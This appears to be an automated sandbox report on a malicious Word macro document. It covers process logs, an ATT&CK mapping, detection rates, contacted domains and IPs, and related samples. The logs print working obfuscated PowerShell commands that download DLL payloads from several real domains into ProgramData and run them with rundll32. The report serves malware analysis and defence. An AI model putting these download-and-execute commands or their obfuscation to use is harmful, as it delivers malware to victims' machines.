Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\ProgramData\pin.vbs
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Path Interception	Process Injection11	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting221	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution23	Logon Script (Windows)	Logon Script (Windows)	Modify Registry1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion21	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection11	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting221	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Extra Window Memory Injection1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
diagram-884.doc	22%	ReversingLabs	Script.Trojan.Sabsik
diagram-884.doc	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
gvmedicine.com	0%	Virustotal	Browse
srdm.in	2%	Virustotal	Browse
scriptcaseblog.com.br	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://scriptcaseblog.com.br/	0%	Avira URL Cloud	safe
https://scriptcaseblog.com.br	0%	Avira URL Cloud	safe
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html	100%	Avira URL Cloud	malware
https://srdm.in/0K6dTttd/ca.html	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.htmlPE	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://gvmedicine.com/c8lDPI	0%	Avira URL Cloud	safe
https://sharayuprakashan.com/90qJEVeD0VAw/ca.html	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://gvmedicine.com/c8lDPI7K/ca.html	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://gvmedicine.com/c8lDPI7K/	0%	Avira URL Cloud	safe
https://gvmedicine.com/c8lDPI7K/ca.htmlPE	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://gvmedicine.com/c8lDPI7	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
https://scriptcaseblog.com.br/8K	0%	Avira URL Cloud	safe
https://venturefiling.com/yP2brxfli/ca.html	0%	Avira URL Cloud	safe
https://gvmedicine.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gvmedicine.com	204.11.58.87	true	false	0%, Virustotal, Browse	unknown
srdm.in	192.185.115.199	true	false	2%, Virustotal, Browse	unknown
scriptcaseblog.com.br	149.56.235.225	true	false	0%, Virustotal, Browse	unknown
sharayuprakashan.com	204.11.58.87	true	false		unknown
venturefiling.com	204.11.58.87	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html	true	Avira URL Cloud: malware	unknown
https://srdm.in/0K6dTttd/ca.html	false	Avira URL Cloud: safe	unknown
https://sharayuprakashan.com/90qJEVeD0VAw/ca.html	false	Avira URL Cloud: safe	unknown
https://gvmedicine.com/c8lDPI7K/ca.html	false	Avira URL Cloud: safe	unknown
https://venturefiling.com/yP2brxfli/ca.html	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	false		high
http://investor.msn.com	powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	false		high
https://scriptcaseblog.com.br/	powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://scriptcaseblog.com.br	powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.htmlPE	powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://gvmedicine.com/c8lDPI	powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	cscript.exe, 00000004.00000002.473930287.0000000003FD0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.447234641.00000000022C0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000007.00000002.446371900.000000000030E000.00000004.00000020.sdmp	false		high
https://gvmedicine.com/c8lDPI7K/	powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	false		high
https://gvmedicine.com/c8lDPI7K/ca.htmlPE	powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000007.00000002.446371900.000000000030E000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	cscript.exe, 00000004.00000002.473930287.0000000003FD0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.447234641.00000000022C0000.00000002.00020000.sdmp, powershell.exe, 00000007.00000002.447254921.0000000002400000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://ocsp.entrust.net0D	powershell.exe, 00000005.00000002.458968211.000000001B7DB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://gvmedicine.com/c8lDPI7	powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	cscript.exe, 00000004.00000002.473418612.0000000001C00000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000005.00000002.458968211.000000001B7DB000.00000004.00000001.sdmp	false		high
https://scriptcaseblog.com.br/8K	powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerhttp://w	powershell.exe, 00000007.00000002.446530536.000000000033A000.00000004.00000020.sdmp	false		high
https://gvmedicine.com	powershell.exe, 00000005.00000002.455060505.00000000038D7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
149.56.235.225	scriptcaseblog.com.br	Canada	16276	OVHFR	false
204.11.58.87	gvmedicine.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
192.185.115.199	srdm.in	United States	46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	484600
Start date:	16.09.2021
Start time:	16:57:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	diagram-884.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winDOC@35/17@5/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:58:23	API Interceptor	217x Sleep call for process: cscript.exe modified
16:58:30	API Interceptor	179x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.56.235.225	CWlXbVUJab.exe	Get hash	malicious	Browse	tqg.myhoost.com/bs/wp.php
149.56.235.225	IMG_102-05_78_6.doc	Get hash	malicious	Browse	tqg.myhoost.com/bs/wp.php
204.11.58.87	http://mdmtech.in/jss/Tax%20Payment%20Challan.zip	Get hash	malicious	Browse	mdmtech.in/jss/Tax%20Payment%20Challan.zip
	TALQ_812421154768_10062020.vbs	Get hash	malicious	Browse	uniquehindunames.com/wp-content/uploads/cnesco/8888888.jpg
	TALQ_46998970_10062020.vbs	Get hash	malicious	Browse	uniquehindunames.com/wp-content/uploads/cnesco/8888888.jpg
	agreement.doc	Get hash	malicious	Browse	icaninfotech.com/vyMc0pgx
	agreement.doc	Get hash	malicious	Browse	icaninfotech.com/vyMc0pgx/
	http://abhiramnirman.com/Invoice-826063/	Get hash	malicious	Browse	abhiramnirman.com/Invoice-826063/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	SPECIFICATION-0995636.doc	Get hash	malicious	Browse	146.59.132.186
	PO sept2116 FRP-SHM.doc	Get hash	malicious	Browse	146.59.132.186
	snyde.exe	Get hash	malicious	Browse	91.134.184.236
	NEW_ORDER_LIST.xlsx	Get hash	malicious	Browse	167.114.30.174
	vbc.exe	Get hash	malicious	Browse	167.114.30.174
	FJ6LS9KGXc.exe	Get hash	malicious	Browse	94.23.146.194
	DOC.exe	Get hash	malicious	Browse	213.186.33.5
	xd.x86	Get hash	malicious	Browse	164.133.130.99
	(RFQ) No.109050.xlsx	Get hash	malicious	Browse	144.217.61.66
	ORDER CONFIRMATION.xlsx	Get hash	malicious	Browse	192.99.131.252
	qy2t7MIRoi.exe	Get hash	malicious	Browse	92.222.145.236
	ORDER 5172020.xlsx	Get hash	malicious	Browse	144.217.61.66
	zB34E25PZM.exe	Get hash	malicious	Browse	87.98.185.184
	USD INV#1191189.xlsx	Get hash	malicious	Browse	213.186.33.5
	mips	Get hash	malicious	Browse	54.37.203.235
	lEsEX3McwH.exe	Get hash	malicious	Browse	51.254.69.209
	5cv9ajEWlI	Get hash	malicious	Browse	51.79.103.19
	oAQ0OaThsM	Get hash	malicious	Browse	213.251.181.247
	ORDER 5172020.xlsx	Get hash	malicious	Browse	144.217.61.66
	New_PO0056329.xlsx	Get hash	malicious	Browse	164.132.216.38
PUBLIC-DOMAIN-REGISTRYUS	maaal.doc	Get hash	malicious	Browse	116.206.105.115
	maaal.doc	Get hash	malicious	Browse	116.206.105.115
	TOP URGENT.exe	Get hash	malicious	Browse	208.91.199.225
	HSBc20210216B1.exe	Get hash	malicious	Browse	208.91.199.225
	POINQUIRYRFQ676889.exe	Get hash	malicious	Browse	208.91.199.223
	PO- 45020032 Juv#U00e9l AS.exe	Get hash	malicious	Browse	208.91.199.224
	Qoutation for Strips.doc	Get hash	malicious	Browse	162.215.241.145
	48q74tT5IK.exe	Get hash	malicious	Browse	208.91.199.224
	qiQvJ3jGU2.exe	Get hash	malicious	Browse	208.91.199.225
	S121093 - RE Wire Transfer - 8,000.00 USD - deposit.exe	Get hash	malicious	Browse	208.91.199.224
	angelzx.exe	Get hash	malicious	Browse	162.215.241.145
	Final Sept Order #0921.exe	Get hash	malicious	Browse	208.91.199.224
	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	199.79.62.16
	DHL Express Invoice.exe	Get hash	malicious	Browse	208.91.198.143
	0zWKZlSOqL.exe	Get hash	malicious	Browse	199.79.62.16
	ee5s192YZ34Ybve.exe	Get hash	malicious	Browse	208.91.199.224
	Payment advice_103.exe	Get hash	malicious	Browse	199.79.62.145
	QUOTATION.exe	Get hash	malicious	Browse	162.215.249.19
	diagram-595.doc	Get hash	malicious	Browse	116.206.105.115
	Payment Advice 09092021 HSBC096754BK56CBREF.exe	Get hash	malicious	Browse	208.91.199.224

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	REQ_Scan001_No- 9300340731.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	SCANNED DOCUMENT 00001.rtf	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	maaal.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	vkb.xlsx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	Enclosed.xlsx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	diagram-129.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	diagram-129.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	diagram-477.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	diagram-477.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
